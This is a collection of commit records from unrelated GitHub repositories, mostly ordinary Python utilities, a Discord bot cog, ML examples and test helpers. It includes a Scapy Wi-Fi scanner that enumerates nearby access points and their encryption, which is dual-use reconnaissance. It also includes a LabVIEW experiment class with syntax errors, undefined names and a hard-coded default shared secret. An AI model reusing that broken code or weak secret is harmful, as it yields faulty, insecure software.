print 'please make sure enter all items with the same length'
Check = 0
break
while (Check):
for j in range(0,len(arg[0])):
result = ()
for item in arg:
result = result + (item[j],)
Result.append(result)
Check = 0
return Result
def unzip(x):
Length = len(x[0])
result = ()
LIST = []
for i in range(0,len(x[0])):
LIST.append([],)
for item in x:
for j in range(0,len(LIST)):
LIST[j].append(item[j])
for k in LIST:
result = result + (k,)
return result
def Test():
print '#1 test: '
print ' zip([1,1,1],[2,2,2],[3,3,3],[4,4,4]) -->', zip([1,1,1],[2,2,2],[3,3,3],[4,4,4])
print '\n'
print ' unzip([(1,2,3,4,5),(2,3,4,5,6),(3,4,5,6,7)]) -->', unzip([(1,2,3,4,5),(2,3,4,5,6),(3,4,5,6,7)])
print '\n'
print '#2 test: unzip(zip([100,200,300],[200,300,400],[0,0,0]))'
print unzip(zip([100,200,300],[200,300,400], [0,0,0]))
print '\n'
if __name__ == '__main__':
Test()
| unlicense | Python | |
6701b9001b85b440f1cea8bdca5f93fb9abbf9b8 | Add buzzer1 script(node) | DaisukeUra/pimouse_ros,DaisukeUra/pimouse_ros | scripts/buzzer1.py | scripts/buzzer1.py | #!/usr/bin/env python
import rospy
rospy.init_node('buzzer')
rospy.spin()
| bsd-3-clause | Python | |
4f9db89ea1beae50c27f00f4e52279af60987df2 | Set up sprint template script | rdocking/bits_and_bobs | sprint_template.py | sprint_template.py | #!/usr/bin/env python
# encoding: utf-8
"""
sprint_template.py
Created by Rod Docking on 2016-12-28.
Copyright (c) 2016 Canada's Michael Smith Genome Sciences Centre.
All rights reserved.
"""
import sys
import os
import argparse
SPRINT_TEMPLATE = """---
title: "Sprint $NUM: Witty Subtitle"
author: "Rod Docking"
date: 'YYYY-MM-DD'
csl: ../../references/csl/apa.csl
bibliography: ../../references/paperpile_export.bib
---
## Current Sprint
- What are the goals for the current sprint?
- Current analysis:
- ✅ Done ticket (**POINTS**)
- ⏩ In-progress ticket (**POINTS**)
- ◽ Open ticket (**POINTS**)
- Thesis planning:
- Planning task (**NUM x CATEGORY**)
- Current reading:
- Reading task (**NUM x CATEGORY**)
- Background reading:
- Reading task (**NUM x CATEGORY**)
- Meta and Admin:
- Admin task (**NUM x CATEGORY**)
- Support:
- Support task (**NUM x CATEGORY**)
## Agile Metrics Tracking
### Story Points
| | Last Sprint | Estimate | Actual |
|:-------------------|:------------|:---------------------------------------------|:-------|
| Meeting-free hours | | (8.0hrs/day * 10 days) - (meetings in hours) | |
| Story points | | | |
### Story Points and Intervals
- Estimates:
- Week 1: $Xh committed
- Week 2: $Yh committed
- Estimate of meeting-free hours: 80 - ($X + $Y) = $Zh
- Estimated potential points from `sprint_estimation_tables.rmd`
- Story points assigned at sprint planning meeting:
- Actual:
- Week 1: $Xh committed
- Week 2: $Yh committed
- Actual meeting-free hours: 80 - ($X + $Y) = $Zh
- Story points completed:
- Intervals Goal: (16 * number of working days)
- Interval Targets:
| Category | Estimate | Daily | Actual | Diff |
|:-------------------------------|:---------|:------|:-------|:-----|
| Meta | | | | |
| Current Analysis | | | | |
| Current Reading | | | | |
| Background Reading | | | | |
| Meetings and Seminars | | | | |
| Informatics Support | | | | |
| Scanning, Networking, Browsing | | | | |
| **SUM** | | | | |
## Schedule
### Week 1 - YYYY-MM-DD - YYYY-MM-DD
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
### Week 2 - YYYY-MM-DD - YYYY-MM-DD
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
- YYYY-MM-DD -
## Progress
### Papers Read
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
### Analysis Tickets Completed
- JIRA tickets completed
### Other Accomplishments
- Other noteworthy things that happened
### Push to Next Sprint or Drop
- Things that were dropped at the planning meeting
- Things that were consciously dropped mid-sprint
## Retrospective
- Retrospective thoughts on the sprint
## References
"""
def _parse_args():
parser = argparse.ArgumentParser(
description="""Sprint Planning Template""")
parser.add_argument(
'-s', '--sprint_num', type=int,
help='Sprint number', required=True)
parser.add_argument(
'sprint_title', help='Sprint title')
args = parser.parse_args()
return args
def main():
"""Main function"""
args = _parse_args()
print SPRINT_TEMPLATE
if __name__ == '__main__':
main()
| mit | Python | |
3fc4f4305f59e3dc42478e1b0812aeaa1eee91fa | Add labview_remote_panels | morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,porduna/weblabdeusto,weblabdeusto/weblabdeusto,morelab/weblabdeusto,porduna/weblabdeusto,morelab/weblabdeusto,morelab/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto,weblabdeusto/weblabdeusto | server/src/experiments/labview_remote_panels.py | server/src/experiments/labview_remote_panels.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo.orduna@deusto.es>
#
import base64
import socket
import time
import random
import traceback
import urllib2
import json
import threading
import weakref
from voodoo import log
from voodoo.lock import locked
from voodoo.log import logged
from voodoo.override import Override
from weblab.experiment.experiment import Experiment
import weblab.core.coordinator.coordinator as Coordinator
DEFAULT_DEBUG_MESSAGE = True
DEFAULT_DEBUG_COMMAND = True
class LabviewRemotePanels(Experiment):
def __init__(self, coord_address, locator, config, *args, **kwargs):
super(LabviewRemotePanels, self).__init__(*args, **kwargs)
self.host = config.get('labview_host', 'localhost')
self.port = config.get('labview_port', 20000)
self.shared_secret = config.get('labview_shared_secret', "12345@&")
self.debug_message = config.get('labview_debug_message', DEFAULT_DEBUG_MESSAGE)
self.debug_command = config.get('labview_debug_command', DEFAULT_DEBUG_COMMAND)
if self.debug_message or self.debug_command:
print("LabVIEW Configuration: {}:{} key: {}".format(self.host, self.port, self.shared_secret))
def _dbg_message(self, msg):
if self.debug_message:
print(msg)
def _dbg_command(self, msg):
if if self.debug_command:
print(msg)
def _send_message(self, message):
message = message + '\r\n'
self._dbg_message("Creating socket")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._dbg_message("Connecting...")
s.connect((self.host, self.port))
self._dbg_message("Connected. Sending message: %s" % message)
s.send(message)
self._dbg_message("Message sent")
self._dbg_message("Waiting for response")
response = s.recv(1024)
self._dbg_message("Response received: %r" % response)
self._dbg_message("Closing socket")
s.close()
self._dbg_message("Socket closed")
return response
@Override(Experiment)
@logged("info")
def do_start_experiment(self, client_initial_data, server_initial_data):
raw_back_url = json.loads(serialized_client_initial_data).get('back','')
back_url = urllib2.quote(raw_back_url,'')
data = json.loads(server_initial_data)
username = data['request.username']
time_slot = int(server_data['priority.queue.slot.length'])
self.current_client_key = str(random.random())[2:7]
message = '@@@'.join(('start', self.shared_secret, self.current_client_key, username, back_url, str(time_slot)))
json_response = self._send_message(message)
response = json.loads(json_response)
current_config = {
'url' : response['url'],
}
return json.dumps({"initial_configuration": json.dumps(current_config), "batch": False})
@Override(Experiment.Experiment)
def do_should_finish(self):
message = '@@@'.join(('status', WEBLAB_SECRET))
json_response = _send_message(message)
if not json_response:
return 10
try:
response = int(json_response)
except ValueError:
return 10
else:
return response
@Override(Experiment.Experiment)
def do_dispose(self):
message = '@@@'.join(('end', WEBLAB_SECRET))
_send_message(message)
return 'ok'
| bsd-2-clause | Python | |
963c0479b22e1cc142b015b5afdccfb8c35aa4b6 | Add initial SD cog | Naught0/qtbot | cogs/diffusion.py | cogs/diffusion.py | import asyncio
import backoff
from typing import Any, Literal
from discord import Embed
from discord.ext import commands
from aiohttp import ClientResponseError
from bot import QTBot
from utils.custom_context import CustomContext
class DiffusionError(Exception):
pass
class Diffusion(commands.Cog):
INPUT = {
"input": {
"width": 512,
"height": 512,
"num_outputs": "1",
"guidance_scale": 7.5,
"prompt_strength": 0.8,
"num_inference_steps": 50,
}
}
URL = "https://replicate.com/api/models/stability-ai/stable-diffusion/versions/a9758cbfbd5f3c2094457d996681af52552901775aa2d6dd0b17fd15df959bef/predictions"
def __init__(self, bot: QTBot):
self.bot = bot
@backoff.on_exception(backoff.expo, ClientResponseError, max_tries=3)
async def req(
self, verb: Literal["GET", "POST"], url: str = "", params: dict = None, headers: dict = None, data: dict = None
) -> Any:
resp = await self.bot.aio_session.request(verb, f"{self.URL}{url}", params=params, headers=headers, json=data)
resp.raise_for_status()
return await resp.json()
async def start_job(self, prompt: str) -> str:
payload = {**self.INPUT, "prompt": prompt}
resp = await self.req("POST", data=payload)
if resp["error"]:
raise DiffusionError(resp["error"])
return resp["uuid"]
async def check_progress(self, id: str) -> str:
total_checks = 0
while True:
resp = (await self.req("GET", f"/{id}"))["prediction"]
if total_checks >= 10:
raise asyncio.TimeoutError("Couldn't get a result after 20 seconds. Aborting.")
if resp["error"]:
raise DiffusionError(resp["error"])
if resp["completed_at"]:
return resp["output"][0]
total_checks += 1
asyncio.sleep(2)
@commands.command(aliases=["diffuse", "sd"])
async def diffusion(self, ctx: CustomContext, *, prompt: str) -> None:
try:
job_id = await self.start_job(prompt)
except DiffusionError as e:
return await ctx.error("API Error", str(e))
except ClientResponseError as e:
return await ctx.error("API Error", f"Received status code {e.status}\n{e.message}")
try:
image_url = await self.check_progress(job_id)
except DiffusionError as e:
return await ctx.error("API Error", str(e))
except ClientResponseError as e:
return await ctx.error("API Error", f"Received status code {e.status}\n{e.message}")
return await ctx.send(f"{ctx.author.mention}: {prompt}\n{image_url}")
| mit | Python | |
68ba7f13c0a1db663d97ffc8f1601eb15cfa52b3 | Create wireless_scanner.py | rs91092/Scapy-wireless-scanner | wireless_scanner.py | wireless_scanner.py | #Implementation of a wireless scanner using Scapy library
#!/usr/bin/env python
# rs.py - Wireless AP scanner
#author rahil sharma
# date 15/3/2013 @rs
#usage python rs.py mon0
import sys, os, signal
from multiprocessing import Process
from scapy.all import *
interface='' # monitor interface
aps = {} # dictionary to store unique APs
# process unique sniffed Beacons and ProbeResponses.
#haslayer packet has Dot11 layer present
#ord() string to integer ex ord('a) will give 97
def sniffAP(p):
if ( (p.haslayer(Dot11Beacon))):
ssid = p[Dot11Elt].info
bssid = p[Dot11].addr3
channel = int( ord(p[Dot11Elt:3].info))
capability = p.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}\
{Dot11ProbeResp:%Dot11ProbeResp.cap%}")
# Check for encrypted networks
#now we put Dot11Beacon.cap info in capability and using regular expression search inbuilt function in python we search for privacy if it is present then the network is encrypted
#output of the above cap file is somewhat like this short-slot+DSSS-OFDM+res15+ESS
if re.search("privacy", capability): enc = 'Y'
else: enc = 'N'
# Save discovered AP
aps[p[Dot11].addr3] = enc
# Display discovered AP
print "%02d %s %s %s" % (int(channel), enc, bssid, ssid)
# Channel hopper - we are making a channel hopper because we want to scan the whole wireless spectrum.
#first choose a random channel using randrange function
#use system to run the shell command iw dev wlan0 set channel 1
#exit when a keyboard interrupt is given CTrl+c
def channel_hopper():
while True:
try:
channel = random.randrange(1,15)
os.system("iw dev %s set channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt:
break
# Capture interrupt signal and cleanup before exiting
#terminate is used to end the child process
#before exiting the program we will be displaying number of aps found etc.
#here Cntrl+c is used to
#signal_handler used to do clean up before the program exits
def signal_handler(signal, frame):
p.terminate()
p.join()
print "\n-=-=-=-=-= STATISTICS =-=-=-=-=-=-"
print "Total APs found: %d" % len(aps)
print "Encrypted APs : %d" % len([ap for ap in aps if aps[ap] =='Y'])
print "Unencrypted APs: %d" % len([ap for ap in aps if aps[ap] =='N'])
sys.exit(0)
#use this for command line variables
#for checking the number of command line variables and if they are in right order
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage %s monitor_interface" % sys.argv[0]
sys.exit(1)
interface = sys.argv[1]
#take mon0 as interface given in the fist command line variable
# Print the program header
print "-=-=-=-=-=-= rs_scan.py =-=-=-=-=-=-"
print "CH ENC BSSID SSID"
# Start the channel hopper
#In multiprocessing, processes are spawned by creating a Process object and then calling its start() method
p = Process(target = channel_hopper)
p.start()
# Capture CTRL-C
#this will call the signal handler CTRL+C comes under the SIGINT
signal.signal(signal.SIGINT, signal_handler)
# Start the sniffer
sniff(iface=interface,prn=sniffAP)
#inbuit scapy function to start sniffing calls a function which defines the criteria and we need to give the interface
| mit | Python | |
01c619826a32a78c121b1ded0c6c5cf3195a0cfe | refactor currency | Go-In/go-coup,Go-In/go-coup,Go-In/go-coup,Go-In/go-coup,Go-In/go-coup | storemanage/models/Currency.py | storemanage/models/Currency.py | from django.db import models
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField
# Create your models here.
class Currency(models.Model):
name = models.CharField(max_length=30)
store = models.ForeignKey(User, on_delete=models.CASCADE)
attribute = JSONField(default = dict())
available = models.BooleanField(default=True)
def __str__(self):
return self.name
| mit | Python | |
cdefa248cb481f8b8a676fd674a4290f95d15145 | Add tool to fix MP4 file timestamp from GPMF GPS clock | rambo/python-gpmf,rambo/python-gpmf | fix_mp4_timestamp.py | fix_mp4_timestamp.py | #!/usr/bin/env python3
import datetime
import shutil
import gpmf.extract
import gpmf.parse
import hachoir.editor
import hachoir.parser
import hachoir.stream
from hachoir.field import MissingField
def locate_fields_by_subpath(parser, subpath):
"""Locate mp4 fields by their subpath element name"""
def recursive_search(atom, retlist=[]):
try:
cd = atom[subpath]
retlist.append(cd)
except MissingField:
pass
try:
for x in atom:
retlist = recursive_search(x, retlist)
except KeyError as e:
pass
return retlist
return recursive_search(parser)
def fix_file_timestamp(filepath, overwrite=False):
"""Fixed mp4 file metadata timestamps to GPS clock (if available)"""
newpath = filepath + '.new'
payloads, parser = gpmf.extract.get_gpmf_payloads_from_file(filepath)
have_fix = False
starttime = None
for gpmf_data, timestamps in payloads:
for element, parents in gpmf.parse.recursive(gpmf_data):
if element.key == b'GPSF' and gpmf.parse.parse_value(element) > 0:
have_fix = True
if have_fix and element.key == b'GPSU':
gpstime = gpmf.parse.parse_value(element)
starttime = gpstime - datetime.timedelta(seconds=timestamps[0] / 1000)
break
if not starttime:
print("ERROR: No GPS fix/time found")
return False
# We happen to know this is always in UTC so we can just drop the tzinfo
starttime_naive = starttime.replace(tzinfo=None)
# Create editor and adjust timestamps
editor = hachoir.editor.createEditor(parser)
changed = False
for atom in locate_fields_by_subpath(parser, 'creation_date'):
cd = editor[atom.path]
if cd.value == starttime_naive:
continue
cd.value = starttime_naive
changed = True
if not changed:
print("INFO: Nothing was changed")
return True
# Write the changed data
output = hachoir.stream.FileOutputStream(newpath)
with output:
editor.writeInto(output)
if overwrite:
shutil.move(newpath, filepath)
return True
if __name__ == '__main__':
import sys
overwrite = False
if len(sys.argv) > 2:
overwrite = bool(int(sys.argv[2]))
result = fix_file_timestamp(sys.argv[1], overwrite)
if not result:
sys.exit(1)
| mit | Python | |
5a36c269a89d5c2a835696a817ea24ea4d4ce72e | add script to performance of trace processor ingestion am: c893b17841 am: 69ca53841e am: b084bd3e82 | google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto,google/perfetto | tools/measure_tp_performance.py | tools/measure_tp_performance.py | #!/usr/bin/env python3
# Copyright (C) 2021 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import re
import signal
import sys
import subprocess
import psutil
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
REGEX = re.compile(
'.*Trace loaded: ([0-9.]+) MB in ([0-9.]+)s \(([0-9.]+) MB/s\)')
def run_tp_until_ingestion(args, env):
tp_args = [os.path.join(args.out, 'trace_processor_shell'), args.trace_file]
if not args.ftrace_raw:
tp_args.append('--no-ftrace-raw')
tp = subprocess.Popen(
tp_args,
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env)
lines = []
while True:
line = tp.stderr.readline()
lines.append(line)
match = REGEX.match(line)
if match:
break
if tp.poll():
break
ret = tp.poll()
fail = ret is not None and ret > 0
if fail:
print("Failed")
for line in lines:
sys.stderr.write(line)
return tp, fail, match[2]
def heap_profile_run(args, dump_at_max: bool):
profile_args = [
os.path.join(ROOT_DIR, 'tools', 'heap_profile'), '-i', '1', '-n',
'trace_processor_shell', '--print-config'
]
if dump_at_max:
profile_args.append('--dump-at-max')
config = subprocess.check_output(
profile_args,
stderr=subprocess.DEVNULL,
)
out_file = os.path.join(
args.result, args.result_prefix + ('max' if dump_at_max else 'rest'))
perfetto_args = [
os.path.join(args.out, 'perfetto'), '-c', '-', '--txt', '-o', out_file
]
profile = subprocess.Popen(
perfetto_args,
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
profile.stdin.write(config)
profile.stdin.close()
env = {
'LD_PRELOAD': os.path.join(args.out, 'libheapprofd_glibc_preload.so'),
'TRACE_PROCESSOR_NO_MMAP': '1',
'PERFETTO_HEAPPROFD_BLOCKING_INIT': '1'
}
(tp, fail, _) = run_tp_until_ingestion(args, env)
profile.send_signal(signal.SIGINT)
profile.wait()
tp.stdin.close()
tp.wait()
if fail:
os.remove(out_file)
def regular_run(args):
env = {'TRACE_PROCESSOR_NO_MMAP': '1'}
(tp, fail, time) = run_tp_until_ingestion(args, env)
p = psutil.Process(tp.pid)
mem = 0
for m in p.memory_maps():
mem += m.anonymous
tp.stdin.close()
tp.wait()
print(f'Time taken: {time}s, Memory: {mem / 1024.0 / 1024.0}MB')
def only_sort_run(args):
env = {
'TRACE_PROCESSOR_NO_MMAP': '1',
'TRACE_PROCESSOR_SORT_ONLY': '1',
}
(tp, fail, time) = run_tp_until_ingestion(args, env)
tp.stdin.close()
tp.wait()
print(f'Time taken: {time}s')
def main():
parser = argparse.ArgumentParser(
description="This script measures the running time of "
"ingesting a trace with trace processor as well as profiling "
"trace processor's memory usage with heapprofd")
parser.add_argument('--out', type=str, help='Out directory', required=True)
parser.add_argument(
'--result', type=str, help='Result directory', required=True)
parser.add_argument(
'--result-prefix', type=str, help='Result file prefix', required=True)
parser.add_argument(
'--ftrace-raw',
action='store_true',
help='Whether to ingest ftrace into raw table',
default=False)
parser.add_argument('trace_file', type=str, help='Path to trace')
args = parser.parse_args()
traced = subprocess.Popen([os.path.join(args.out, 'traced')],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
print('Heap profile dump at max')
heap_profile_run(args, dump_at_max=True)
print('Heap profile dump at resting')
heap_profile_run(args, dump_at_max=False)
print('Regular run')
regular_run(args)
print('Only sort run')
only_sort_run(args)
traced.send_signal(signal.SIGINT)
traced.wait()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
8103632a7acc080e8a9d108c047acffa2539c4b9 | solve factorial problem | vtemian/uni-west,vtemian/uni-west,vtemian/uni-west,vtemian/uni-west,vtemian/uni-west,vtemian/uni-west,vtemian/uni-west | graph/2/factorial.py | graph/2/factorial.py | def factorial(n):
if n <= 1:
return 1
return n * factorial(n - 1)
if __name__ == "__main__":
n = raw_input("n: ")
print "result is:", factorial(int(n))
| apache-2.0 | Python | |
08e52c671ef405c34e532f1ca29e7fc2ee6892d9 | Add python script that should submit to view.cwl API | curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g,curoverse/l7g | viewcwl-json.py | viewcwl-json.py | #!/usr/bin/env python
import fnmatch
import requests
import time
import os
import glob
# You can alternatively define these in travis.yml as env vars or arguments
BASE_URL = 'https://view.commonwl.org'
WORKFLOW_PATH = '/workflows/workflow.cwl'
#get the cwl in l7g/cwl-version
matches = []
for root, dirnames, filenames in os.walk('cwl-version'):
for filename in fnmatch.filter(filenames, '*.cwl'):
matches.append(os.path.join(root, filename))
print matches
REPO_SLUG = 'curoverse/l7g/tree/master/'
#Testing WORKFLOW_PATH
WORKFLOW_PATH = 'cwl-version/npy/cwl/cwl_steps/tiling_consol-npy.cwl'
#This will loop through matches, need to indent everything after to make work
#for WORKFLOW_PATH in matches:
# Whole workflow URL on github
workflowURL = 'https://github.com/' + REPO_SLUG + WORKFLOW_PATH
print workflowURL,'\n'
# Headers
HEADERS = {
'user-agent': 'my-app/0.0.1',
'accept': 'application/json'
}
# Add new workflow with the specific commit ID of this build
addResponse = requests.post(BASE_URL + '/workflows',
data={'url': workflowURL},
headers=HEADERS)
if addResponse.status_code == requests.codes.accepted:
qLocation = addResponse.headers['location']
# Get the queue item until success
qResponse = requests.get(BASE_URL + qLocation,
headers=HEADERS,
allow_redirects=False)
maxAttempts = 5
while qResponse.status_code == requests.codes.ok and qResponse.json()['cwltoolStatus'] == 'RUNNING' and maxAttempts > 0:
time.sleep(5)
qResponse = requests.get(BASE_URL + qLocation,
headers=HEADERS,
allow_redirects=False)
maxAttempts -= 1
if qResponse.headers['location']:
# Success, get the workflow
workflowResponse = requests.get(BASE_URL + qResponse.headers['location'], headers=HEADERS)
if (workflowResponse.status_code == requests.codes.ok):
workflowJson = workflowResponse.json()
# Do what you want with the workflow JSON
# Include details in documentation files etc
print(BASE_URL + workflowJson['visualisationSvg'])
print('Verified with cwltool version ' + workflowJson['cwltoolVersion'])
# etc...
else:
print('Could not get returned workflow')
elif qResponse.json()['cwltoolStatus'] == 'ERROR':
# Cwltool failed to run here
print(qResponse.json()['message'])
elif maxAttempts == 0:
print('Timeout: Cwltool did not finish')
else:
print('Error adding workflow')
| agpl-3.0 | Python | |
9700cf8aa468ce364067d1cdf80cd5e968aef08a | Create classification_examples.py | mcStargazer/nlp_talk_apr2017 | classification_examples.py | classification_examples.py | # -*- coding: utf-8 -*-
##############################################################################
# references
##############################################################################
# www.udemy.com/machinelearning/ - I really enjoyed this course. Take it!
# original data/code at www.superdatascience.com/machine-learning/
# en.wikipedia.org/wiki/Statistical_classification
# en.wikipedia.org/wiki/Confusion_matrix
##############################################################################
# import the libraries
##############################################################################
# look to the future if running on Python 2.7
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# importing the standard libraries
import os
import sys
# import 3rd party libraries
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
import pandas as pd
from sklearn.metrics import confusion_matrix
from sklearn.tree import DecisionTreeClassifier as DTC
from sklearn.naive_bayes import GaussianNB as GNB
from sklearn.ensemble import RandomForestClassifier as RFC
from sklearn.preprocessing import StandardScaler
from sklearn.cross_validation import train_test_split as split
# importing local
sys.path.append(os.path.abspath('.'))
##############################################################################
# user defined functions
##############################################################################
def plotter(X, y, title, x_label, y_label):
"""
A useful plotting routine for binary classifiers.
"""
X1, X2 = np.meshgrid(np.arange(start = X[:, 0].min() - 1,
stop = X[:, 0].max() + 1,
step = 0.01),
np.arange(start = X[:, 1].min() - 1,
stop = X[:, 1].max() + 1,
step = 0.01))
plt.contourf(X1, X2,
classifier.predict(np.array([X1.ravel(),
X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75,
cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y)):
plt.scatter(X[y == j, 0], X[y == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title(title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.legend()
plt.show()
##############################################################################
# prepare the data: read, split, and transform
##############################################################################
# read the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the training set and test set
X_train, X_test, y_train, y_test = split(X, y, test_size=0.25, random_state=0)
# feature scaling: mandatory for distance-based learning, helpful in plotting
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
##############################################################################
# build the model
##############################################################################
# uncomment a classifier, and change graph titles at end...
#classifier = DTC(criterion='entropy', random_state=0)
classifier = RFC(n_estimators=10, criterion='entropy', random_state=0)
#classifier = GNB()
# fit the model and predict the test set results
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
##############################################################################
# numerical assessment
##############################################################################
# set up the formats and header for reporting
header = "{:>9s},{:>10s},{:>7s},{:>6s}"
rows = "{:>9.3f},{:>10.3f},{:>7.3f},{:>6.3f}"
# Making the Confusion Matrix and derivative metrics
cm = confusion_matrix(y_test, y_pred)
a = (cm[0,0] + cm[1,1])/np.sum(cm) # accuracy = (TP+TN)/(TP+TN+FP+FN)
p = cm[0,0]/(cm[0,0] + cm[1,0]) # precision = TP/(TP+FP)
c = cm[0,0]/(cm[0,0] + cm[0,1]) # completeness = TP/(TP+FN)
f1 = 2*p*c/(p + c) # blend of precision and completeness
# report the numbers
print(header.format("accuracy", "precision", "recall", "f1"))
print(rows.format(a, p, c, f1))
##############################################################################
# visual assessment
##############################################################################
# plot description
method = "Decision Tree Classification"
x_axis = "Age"
y_axis = "Estimated Salary"
# visualising the training set results
plotter(X_train, y_train, method + " (Training set)", x_axis, y_axis)
# visualising the test set results
plotter(X_test, y_test, method + " (Test set)", x_axis, y_axis)
##############################################################################
# further work...
##############################################################################
# work with domain specialists
# avoid overfitting
# avoid overly complicated models
# trying other classifiers
# varying (some, many, all) parameters for a given classifier
# don't specify the "random" state parameters
# n-fold cross validation
# other?
| mit | Python | |
f498610ce8b4d9ec4b010e16a9d738c937ff3c72 | add db only tests utility #96 | biothings/biothings.api,biothings/biothings.api | biothings/tests/hub.py | biothings/tests/hub.py |
# DatabaseCollectionTesting
# Author: Amiteshk Sharma
# https://github.com/amiteshksharma/Database-Testing
import pymongo
from jsonpath_ng import jsonpath, parse
class DatabaseCollectionTesting:
"""
Constructor that takes in three items
db_url - string - the mongoDB url to connect to
db - string - name of DB to use
collection - string - name of collection in db
"""
def __init__(self, db_url, db, collection):
if "mongo" not in db_url:
raise ValueError
self.database_url = db_url
self.client = pymongo.MongoClient(db_url)
self.db = self.client[db]
self.collection = self.db[collection]
# test to see if there exists only 1 item for an ID
# _id - the document _id to query
def test_field_unique_id(self, _id):
get_item = self.collection.find({"_id": _id})
item = list(get_item)
assert len(item) == 1
# check for all items within a taxid
# taxid - the taxid of the document to query
def test_field_taxid(self, taxid):
get_items = self.collection.find({"taxid": taxid})
item_list = list(get_items)
assert len(item_list) >= 1
# check all documents with the same taxid value
def test_documents_taxid(self, taxid):
get_documents = self.collection.find({"taxid": taxid})
doc_list = list(get_documents)
sub_list = ['_id', 'taxid', 'name', 'ensembl', 'symbol']
for doc in doc_list:
keys = doc.keys()
if not all(x in keys for x in sub_list):
# may not contain a name attribute
if "name" not in keys:
pass
# may not contain the ensembl attribute
elif "ensembl" not in keys:
pass
# may not contain the symbol attribute
elif "symbol" not in keys:
pass
else:
assert False
assert True
# check an _id and make sure it does not exist
# _id - the document _id to query
def test_field_does_not_exist(self, _id):
get_items = self.collection.find({"_id": _id})
item_list = list(get_items)
assert len(item_list) == 0
# Check number of documents is correct
# expected count - the expected count of documents with specific taxid
def test_total_document_count(self, expected_count):
get_all_document = self.collection.find()
document_list = list(get_all_document)
assert len(document_list) == expected_count
# check the indices for the mongoDB database
def test_database_index(self):
get_indices = self.collection.index_information()
indices_list = list(get_indices)
size = len(indices_list)
# if only size 1, then it only has _id_ index
if size == 1:
assert all(x in indices_list for x in ['_id_'])
elif size == 3:
assert all(x in indices_list for x in ["_id_", "taxid_1", "entrezgene_1"])
# test the name attribute on randomly selected items in the database
def test_document_name(self):
random_docs = self.collection.aggregate([{"$sample": {"size": 10}}])
count = 0
for doc in random_docs:
if "name" in doc:
count = count + 1
else:
print("_id for document with no name: " + doc["_id"])
assert count == 10
if __name__ == '__main__':
c = DatabaseCollectionTesting("mongodb://su05:27017", "genedoc", "mygene_allspecies_20191111_eeesndlz")
c.test_documents_taxid(29302)
| apache-2.0 | Python | |
af6b04531ebbb0d86bf0177f30e7691221e2b17e | fix date citation for gob's | suranap/boltons,siemens/boltons,kevinastone/boltons,neuropil/boltons,markrwilliams/boltons,mgaitan/boltons,doublereedkurt/boltons,zeroSteiner/boltons | boltons/easterutils.py | boltons/easterutils.py | # -*- coding: utf-8 -*-
def gobs_program():
"""
A pure-Python implementation of Gob's Algorithm (2006). A brief
explanation can be found here:
https://www.youtube.com/watch?v=JbnjusltDHk
"""
while True:
print "Penus",
if __name__ == '__main__':
gobs_program()
| # -*- coding: utf-8 -*-
def gobs_program():
"""
A pure-Python implementation of Gob's Algorithm (2013). A brief
explanation can be found here:
https://www.youtube.com/watch?v=JbnjusltDHk
"""
while True:
print "Penus",
if __name__ == '__main__':
gobs_program()
| bsd-3-clause | Python |
caf0ea95a03b06e09e640799a1f0d959658373ab | Create email.py | IntegrarOffshore/Rastema,Alzemand/Rastema,Alzemand/Rastema,IntegrarOffshore/Rastema,Alzemand/Rastema,IntegrarOffshore/Rastema,IntegrarOffshore/Rastema,Alzemand/Rastema | models/email.py | models/email.py | import smtplib
# Credenciais
remetente = 'seu-email@gmail.com'
senha = 'sua-senha'
